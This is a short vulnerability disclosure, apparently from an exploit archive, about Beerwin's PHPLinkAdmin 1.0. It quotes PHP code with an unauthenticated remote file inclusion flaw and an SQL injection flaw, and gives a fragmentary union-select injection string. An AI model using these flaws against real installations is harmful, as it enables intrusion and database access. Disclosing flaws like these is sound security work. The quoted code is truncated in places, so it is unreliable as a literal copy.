[+] Beerwin's PHPLinkAdmin 1.0 Remote File Inclusion/SQL Injection
[+] Discovered By SirGod
[+] www.mortal-team.org
[+] www.h4cky0u.org
[+] Download : http://www.downloads.beerwin.com/index.php?p=showdl&dl=16&cat=18
[+] Remote File Inclusion
Direct acces to linkadmin.No auth.
Vulnerable code in linkadmin.php :
$page = $_REQUEST['page'];
if (!$page){
echo "Welcome to the PHPLINKADMIN!.
Please select an action from
the left menu.";
include $page;
PoC :
[+] Remote SQL Injection
Is a lot of SQL Injection vulnerabilities in the script.I will
present only one.
Vulnerable code in edlink.php :
if (!$linkid){
echo "Error: Link missing!
$sql=mysql_query("SELECT * FROM linktable WHERE linkid='$linkid'")
or die(mysql_error());
PoC :' union all select
No important things to extract from database.